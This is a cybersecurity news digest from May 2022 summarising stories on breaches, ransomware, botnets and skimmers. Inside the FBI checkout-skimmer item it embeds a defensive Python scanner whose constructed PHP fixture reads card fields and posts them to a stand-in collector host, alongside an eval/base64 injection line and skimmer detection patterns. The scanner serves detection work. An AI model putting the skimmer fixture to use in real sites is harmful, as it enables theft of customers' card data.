Friday, May 20, 2022 // (IG): BB //Weekly Sponsor: Unsafe Waters
Wikidot Hacked By Russian Hackers
FROM THE MEDIA: Wikidot was hacked, with all traces leading to the Russian Federation. Wikidot is the world’s largest wiki farm, which allows anyone to start a wiki site. People use it to publish content, share documents, and collaborate with friends or co-workers.
The website was first hit by denial-of-service attacks, which Wikidot reported via a tweet. The attacks are believed to have originated from Russia; according to Wikidot’s tweet, the Russian Federation “left quite a mess”.
READ THE STORY: Fossbytes
Critical VMware vulnerabilities resurface after threat actors evade patches within 48 hours
FROM THE MEDIA: This is the latest in an ongoing security saga for VMware, a vendor threat actors have prodded frequently in the last year.
VMware products are a common and recurring target for threat actors. Log4Shell vulnerabilities in VMware Horizon were exploited to create web shells in January 2022, less than a month after the vendor issued security updates following initial Log4j vulnerability disclosures. Days later, threat actors were installing Cobalt Strike implants in multiple VMware Horizon servers.
READ THE STORY: CyberSecurityDive
This Russian botnet does far more than DDoS attacks - and on a massive scale
FROM THE MEDIA: An investigation into the Fronton botnet has revealed far more than the ability to perform DDoS attacks, with the exposure of coordinated inauthentic behavior "on a massive scale."
On Thursday, cybersecurity firm Nisos published new research revealing the inner workings of the unusual botnet.
Fronton first hit the headlines back in 2020 when ZDNet reported that a hacktivist group claimed to have broken into a contractor for the FSB, Russia's intelligence service, and published technical documents appearing to show the construction of the IoT botnet on the intelligence service's behalf.
READ THE STORY: ZDNET
Omnicell Suffers Ransomware Attack, Impact To Internal Systems
FROM THE MEDIA: It has been reported that multinational company Omnicell recently confirmed that it had experienced a data breach following a reported ransomware attack, impacting internal systems. The company, headquartered in Mountain View, California, USA, learned of the ransomware attack, which it disclosed on May 9 2022 in a 10-Q filing with the Securities and Exchange Commission. More details are likely to be disclosed in the coming weeks.
READ THE STORY: Information Security Buzz
QNAP urges users to update after new Deadbolt ransomware attacks discovered
FROM THE MEDIA: Data-storage hardware vendor QNAP urged users Thursday to immediately patch network attached storage (NAS) devices after several were infected recently with the Deadbolt ransomware.
QNAP said its Product Security Incident Response Team found that the new attacks “targeted NAS devices using QTS 4.3.6 and QTS 4.4.1, and the affected models were mainly TS-x51 series and TS-x53 series.” QTS is software that allows NAS users to manage the devices, share files and perform other tasks.
READ THE STORY: The Record
China’s GitHub clone making all repos private pending mysterious ‘review’
FROM THE MEDIA: China’s approved GitHub clone, Gitee, has warned users that it will make all existing repositories private pending a mysterious review of their content.
Gitee offers Git and Apache Subversion as a service. But while GitHub has occasionally been banned in China, Gitee was anointed as China’s designated open source development hub in 2020, after the nation’s Ministry of Industry and Information Technology conducted a bidding process.
READ THE STORY: The Register
Canada to ban Chinese telecoms Huawei and ZTE from 5G networks
FROM THE MEDIA: Canada said it will move to ban Huawei and ZTE from providing 5G services in the country, in the latest move by a US ally to target the Chinese equipment telecoms manufacturers. François-Philippe Champagne, Canada’s minister of innovation, science and industry, said on Thursday that the country intended “to prohibit the inclusion of Huawei and ZTE’s products and services in Canada’s telecommunications system”. “Providers who already have this equipment installed will be required to cease its use and remove it,” he said. The federal government will not compensate companies for the removal of Huawei and ZTE gear, he added. Equipment used for 4G networks will also need to be removed.
READ THE STORY: FT
Alarming surge in Conti Ransomware Group activity
FROM THE MEDIA: A new report has identified a 7.6 per cent increase in the number of vulnerabilities tied to ransomware in Q1 2022, with the Conti ransomware group exploiting most of those vulnerabilities.
Ivanti has announced the results of the Ransomware Index Report Q1 2022, which it conducted with Cyber Security Works, a CVE Numbering Authority (CNA), and Cyware, a provider of a technology platform for building Cyber Fusion Centres.
The report uncovered 22 new vulnerabilities tied to ransomware (bringing the total to 310) and connected Conti, a prolific ransomware group that pledged support for the Russian government following the invasion of Ukraine, to 19 of those new vulnerabilities.
READ THE STORY: SecurityBrief
Cyber firm Darktrace distances itself from fraud case
FROM THE MEDIA: British cyber security firm Darktrace on Thursday denied it had been targeted by a fraud probe into US tech giant Hewlett Packard's 2011 purchase of software group Autonomy.
Darktrace shares have tanked since Wednesday after its chief strategy officer Nicole Eagan was named in a British High Court ruling against former Autonomy boss Mike Lynch, who was accused of inflating his company's value before the takeover.
HP won a multi-billion-dollar civil fraud case in January, but the full text of the judgement was published only this week.
READ THE STORY: IndiaTimes
US States Ignoring China Cyber Threats, Says Data Group
FROM THE MEDIA: While US federal agencies and the military have responded robustly to China cyber threats, the 50 states are lagging behind in protection, a consultancy has warned.
ChinaTechThreat.com (CTT) said it had recommended four specific policy ideas for US state governments to counter China cyber threats.
CTT said it had been closely tracking what it called a “state-federal tech threat disconnect” in the US.
The consultancy urged state authorities to restrict Chinese government-owned companies from state purchase and contracts and restrict university partnerships that strengthen the Chinese military.
READ THE STORY: Asian Financial
Cyber security: Global food supply chain at risk from malicious hackers
FROM THE MEDIA: Modern "smart" farm machinery is vulnerable to malicious hackers, leaving global supply chains exposed to risk, experts are warning. It is feared hackers could exploit flaws in agricultural hardware used to plant and harvest crops. Agricultural manufacturing giant John Deere says it is now working to fix any weak spots in its software.
A recent University of Cambridge report said automatic crop sprayers, drones and robotic harvesters could be hacked. The UK government and the FBI have warned that the threat of cyber-attacks is growing.
READ THE STORY: BBC
Conti ransomware shuts down operation, rebrands into smaller units
FROM THE MEDIA: The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more. This news comes from Advanced Intel's Yelisey Boguslavskiy, who tweeted this afternoon that the gang's internal infrastructure was turned off.
While public-facing 'Conti News' data leak and the ransom negotiation sites are still online, Boguslavskiy told BleepingComputer that the Tor admin panels used by members to perform negotiations and publish "news" on their data leak site are now offline.
READ THE STORY: BleepingComputer
Trend Micro blocked 107mln threats in Saudi Arabia
FROM THE MEDIA: Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global leader in cybersecurity solutions, today released its 2021 annual cybersecurity report: Navigating New Frontiers. The report highlights the growing rate of cyber-attacks by malicious actors on digital infrastructures and individuals in the modern-day hybrid work environment.
The report states that globally Trend Micro solutions stopped over 94.2 billion threats in 2021, a 42% increase on the number of detections recorded in 2020. Detections rose to over 53 billion in the second half of 2021, up from 41 billion in the first half. Ransomware attackers are shifting their focus to critical businesses and industries more likely to pay, and double extortion tactics ensure that they are able to profit. Ransomware-as-a-service offerings have opened the market to cybercriminals with limited technical knowledge, as well as given rise to more specialization, such as initial access brokers who are now an essential part of the cybercrime supply chain. Threat actors are getting better at exploiting human error to compromise cloud infrastructure and remote workers. Home workers are often prone to take more risks than those in the office, which makes phishing a greater risk.
READ THE STORY: Zawya
Analyzing a WooCommerce Credit Card Skimmer
FROM THE MEDIA: The number of credit card skimmers targeting WooCommerce websites has skyrocketed over the past year, and threat actors have become increasingly creative in the different ways they obfuscate their payloads to avoid traditional detection.
During a recent investigation for an infected WordPress website, we discovered an obfuscated credit card stealer hiding amongst the website’s theme files which was exfiltrating stolen credit card details from the WooCommerce plugin.
READ THE STORY: SecurityBoulevard
Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover
FROM THE MEDIA: A critical privilege escalation flaw found in two themes used by more than 90,000 WordPress sites can allow threat actors to take over the sites completely, researchers have found.
Wordfence Threat Intelligence Team researcher Ramuel Gall discovered the flaw, one of five vulnerabilities he found between early April and early May in the Jupiter and JupiterX premium WordPress themes, he revealed in a blog post published Wednesday.
One of the flaws, tracked as CVE-2022-1654 and given a critical CVSS score of 9.9, allows “any authenticated attacker, including a subscriber or customer-level attacker, to gain administrative privileges and completely take over any site running either the Jupiter Theme or JupiterX Core Plugin,” he wrote. The plugin is required to run the JupiterX theme.
READ THE STORY: Threatpost
A year-long Chinese Cyber Espionage Campaign in Russia now targets Defense Research Institutes
FROM THE MEDIA: Check Point Research (CPR) detects an ongoing, cyber espionage operation targeting Russian defense research institutes. Attributed to Chinese nation-state actors, the operation uses spear-phishing emails sent under the guise of the Russian Ministry of Health to collect sensitive information. Emails caught by CPR contained malicious documents that used the Western sanctions against Russia as a decoy, among other social engineering techniques. The threat actors were able to evade detection for nearly 11 months by using new and undocumented tools that CPR now details for the first time. CPR has named the campaign “Twisted Panda” to reflect the sophistication of the tools observed and traced to China.
Russian victims belong to a holding company within the Russian state-owned defense conglomerate Rostec Corporation, Russia’s largest holding company in the radio-electronics industry. Emails carried subject lines such as “List of <target institute name> persons under US sanctions for invading Ukraine” and “US Spread of Deadly Pathogens in Belarus”. The campaign bears multiple overlaps with advanced, long-standing Chinese cyber-espionage actors, including APT10 and Mustang Panda.
READ THE STORY: APN News
Phishing websites now use chatbots to steal your credentials
FROM THE MEDIA: Phishing attacks are now using automated chatbots to guide visitors through the process of handing over their login credentials to threat actors.
This approach automates the process for attackers and gives a sense of legitimacy to visitors of the malicious sites, as chatbots are commonly found on websites for legitimate brands. This new development in phishing attacks was discovered by researchers at Trustwave, who shared the report with Bleeping Computer before publication.
READ THE STORY: BleepingComputer
Steganography in Cybersecurity: A Growing Attack Vector
FROM THE MEDIA: Fully aware of increasing investments made by companies in cybersecurity tools, threat actors constantly tweak, diversify and refine their cyberattack strategies in order to evade detection. One recent trend is an increase in steganography as an attack vector to achieve different objectives, such as masking communications or installing malware. This article explains what steganography in cybersecurity is and why cyber attackers might use this technique, as well as provides some examples of real-world incidents that relied upon steganography, plus mitigation advice.
READ THE STORY: SecurityBoulevard
Threat actors compromising US business online checkout pages to steal credit card information
FROM THE MEDIA: According to the FBI, a US business was targeted in September 2020 by an unidentified threat actor, who inserted malicious PHP code into the checkout page of the targeted company website.
The checkout page was modified to include a link to another piece of code named “cart_required_files.php.” That file, in turn, led to another malicious PHP script dubbed “TempOrders.php” which contained code to scrape and exfiltrate unsuspecting customer data from the shopping cart. Every user buying something on that compromised website would unwittingly send their credit card data to the fraudsters.
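The two skimmer reports in this digest (the obfuscated stealer hiding in WooCommerce theme files, and the FBI case where a checkout page was made to pull in cart_required_files.php, which in turn loaded TempOrders.php) call for the same triage: follow the include chain out of the checkout page and compare it with a known-good manifest, then score every PHP file for the combination a server-side skimmer needs, namely card-field reads plus an outbound channel plus obfuscation. The Python below is an added example written for this page; it is not code from the FBI notice, from Sucuri, or from any vendor. The sample file contents, the baseline manifest, the collector hostname, and the indicator patterns and their weights are all constructed for illustration.

```python
"""Triage scanner for server-side PHP card skimmers (added example).

Two checks are combined:
  1. Walk the include/require chain from the checkout page and report any
     file that is not in a known-good manifest (the FBI case: checkout page
     -> cart_required_files.php -> TempOrders.php).
  2. Score every PHP file for the combination of card-field reads, outbound
     calls and obfuscation that a skimmer needs (the theme-file case).
All sample files, the manifest and the indicator weights are constructed.
"""
import re
from dataclasses import dataclass, field

# Matches include/require(_once) with a quoted literal target.
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)

# name -> (pattern, weight). Presence is scored once per file, not per match.
# Weights are an assumption for this example, not a published rule set.
INDICATORS = {
    "reads_card_fields": (re.compile(
        r"\$_(?:POST|REQUEST)\s*\[\s*['\"](?:card|cc|cvv|cvc|exp|billing)", re.I), 3),
    "reads_whole_post": (re.compile(r"\$_POST\b(?!\s*\[)"), 2),
    "outbound_call": (re.compile(
        r"\b(?:curl_init|curl_exec|fsockopen|stream_socket_client|mail)\s*\(", re.I), 2),
    "remote_url_literal": (re.compile(r"https?://[^\s'\"]+", re.I), 1),
    "obfuscation": (re.compile(
        r"\b(?:base64_decode|gzinflate|str_rot13|eval)\s*\(", re.I), 2),
    "long_encoded_blob": (re.compile(r"['\"][A-Za-z0-9+/=]{80,}['\"]"), 2),
    "encodes_payload": (re.compile(
        r"\b(?:base64_encode|gzdeflate|bin2hex)\s*\(", re.I), 1),
}

# Constructed webroot: path -> contents. Two injections are present.
SAMPLE_FILES = {
    "checkout.php": (
        "<?php\n"
        "// legitimate checkout page, with one injected line at the top\n"
        "require_once('cart_required_files.php');\n"
        "require_once('includes/cart.php');\n"
        "render_checkout($cart);\n"
    ),
    "includes/cart.php": "<?php function render_checkout($cart) { /* ... */ }\n",
    "cart_required_files.php": "<?php include 'TempOrders.php';\n",
    "TempOrders.php": (
        "<?php\n"
        "$n = $_POST['card_number']; $c = $_POST['cvv'];\n"
        "$payload = base64_encode(json_encode($_POST));\n"
        "$ch = curl_init('https://collector.example.invalid/collect.php');\n"
        "curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);\n"
        "curl_exec($ch);\n"
    ),
    "wp-content/themes/storefront/functions.php": (
        "<?php\n"
        "add_action('wp_footer', 'sf_footer');\n"
        "function sf_footer() { echo '<!-- storefront -->'; }\n"
        "// injected: eval of a base64 blob (constructed filler, not a real payload)\n"
        "eval(base64_decode('" + "QUFB" * 30 + "'));\n"
    ),
}

# Known-good manifest (constructed). In practice this would hold file hashes,
# since a listed file can still be modified in place, as the theme file is here.
BASELINE = {"checkout.php", "includes/cart.php",
            "wp-content/themes/storefront/functions.php"}


@dataclass
class Finding:
    path: str
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if self.score >= 5:
            return "likely skimmer"
        if self.score >= 3:
            return "suspicious"
        return "clean"


def include_chain(files: dict, start: str) -> list:
    """Files reachable from `start` through literal include/require targets."""
    seen, order, stack = set(), [], [start]
    while stack:
        path = stack.pop()
        if path in seen or path not in files:
            continue
        seen.add(path)
        order.append(path)
        for target in INCLUDE_RE.findall(files[path]):
            stack.extend(p for p in files if p == target or p.endswith("/" + target))
    return order


def unexpected_includes(files: dict, start: str, baseline: set) -> list:
    """Chain members that the manifest does not know about."""
    return [p for p in include_chain(files, start) if p not in baseline]


def scan(files: dict) -> dict:
    """Score each file; returns path -> Finding."""
    results = {}
    for path, src in files.items():
        f = Finding(path)
        for name, (pattern, weight) in INDICATORS.items():
            if pattern.search(src):
                f.score += weight
                f.hits.append(name)
        results[path] = f
    return results


if __name__ == "__main__":
    for path in unexpected_includes(SAMPLE_FILES, "checkout.php", BASELINE):
        print(f"[chain] {path}: reachable from checkout.php but not in the baseline manifest")
    for path, f in scan(SAMPLE_FILES).items():
        print(f"[content] {path}: {f.verdict} (score {f.score}; {', '.join(f.hits) or 'no hits'})")
```

The two checks deliberately cover each other's blind spot: cart_required_files.php scores zero on content (it only forwards to another file) but is caught by the chain walk, while the theme file is in the manifest but is caught by its eval/base64 blob. Treat a hit as a lead for manual review, not a verdict; a real deployment would also compare file hashes and modification times against the last known-good deploy.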
READ THE STORY: TechRepublic
CISA Issues Advisory on Poor Security Configurations
FROM THE MEDIA: The Cybersecurity and Infrastructure Security Agency (CISA) on May 17 issued a new advisory highlighting how cyber threat-actors are exploiting poor security configurations.
CISA said the poor security configurations include security misconfigurations or network elements that are left unsecured entirely. In addition to poor configurations, CISA noted that threat actors exploit weak controls and “other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system.”
READ THE STORY: Meritalk
CISOs worried about material attacks, boardroom backing
FROM THE MEDIA: The threat of substantial material attacks and getting board support for their efforts are top-of-mind issues among the world's CISOs, according to a new report released by Proofpoint.
Nearly half (48 per cent) of the 1,400 CISOs surveyed for the annual Voice of the CISO report say their organization is at risk of suffering a material cyber attack in the next 12 months. That is substantially lower than in 2021, when nearly two-thirds of CISOs (64 per cent) expressed similar sentiments.
READ THE STORY: Reseller
Ransomware Attack Vectors: RDP and Phishing Still Dominate
FROM THE MEDIA: Attackers who successfully infect targets with ransomware primarily first gain access by exploiting poorly secured remote access connections or by using malware-laden phishing emails. So reports cybersecurity firm Group-IB, based on more than 700 attacks the company's incident response team investigated in 2021.
The average ransom amount demanded in the attacks Group-IB investigated last year was $247,000, which it says was an increase of 45% from 2020. Last year, 63% of all ransomware attacks it investigated involved data exfiltration. How are attackers hacking victims? The firm found 47% of attacks traced to access of an external service, often Remote Desktop Protocol or VPN, while 26% of attacks traced to phishing.
READ THE STORY: Bank InfoSecurity
Items of interest
Interrogating China’s global security initiative
FROM THE MEDIA: Escalating pockets of regional tensions and their impacts beyond the immediate centre of conflict are generating and inflaming security threats across countries. For example, the immediate consequences of the collapse of the Colonel Muammar Gadhafi government in Libya are the flow of light weapons and military instructors, which have fed insurgencies in the Sahel in West Africa, with Nigeria as a principal victim where extremist insurgency has mutated into the violent criminal activities of banditry and kidnapping. The violent overthrow of the legitimate government of Libya in 2011, with the active connivance of the U.S.-led North Atlantic Treaty Organization (NATO), and the subsequent assassination of its leader, Colonel Gadhafi, was the crucial enabler of the chain of destructive insurgencies, banditries and other forms of venal criminal activities that have engulfed the Sahel region and Nigeria. The conflict in the Sahel inspired by extremist insurgency has fuelled political instability, paving the way for the return and establishment of military regimes in Mali and Burkina Faso, two countries in the Sahel caught up in the murderous backlash of the violent regime change in Libya promoted by the U.S.-led NATO.
Nigeria’s Northeast has long combusted in the murderous insurgency of Boko Haram and the Islamic State in West Africa Province, ISWAP. The Northwest and other parts of the country are not spared the spate of criminal impunity fuelled by the flows of illegal weapons traded from the huge Libyan armoury flung open by the NATO-inspired destabilization of the country.
With the confluence of these and other factors fuelling tensions and feeding the increasing security governance and productive capacity deficits across the world, China’s recent global security initiative is worth a careful scrutiny and interrogation.
READ THE STORY: The Nation
FBI and CISA on Latest Russian Cyber Threats (Video)
FROM THE MEDIA: The U.S. Chamber of Commerce was joined by the FBI and CISA for a virtual briefing about Russian cyber threats. In this conversation, Kurtis Ronnow, Deputy Assistant Director, FBI Counterintelligence Division; W. Mike Herrington, Section Chief, FBI Cyber Division; and Matt Hartman, Deputy Executive Assistant Director of Cybersecurity, CISA discussed the cyber aspects of the war in Ukraine, the tactics employed by Russian state-sponsored cyber actors, and why we have not seen Russian cyberattacks on the scale that many experts expected when the conflict began.
Attacking The Malware With AI (Video)
FROM THE MEDIA: Malware poses one of the greatest threats to the cyber industry. More than 450,000 new malicious programs and potentially unwanted applications (PUA) are registered every day (AV-Test Institute, 2022). As a result, there is an imperative need to automate the process of malware analysis by onboarding artificial intelligence into our defense toolbox.
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com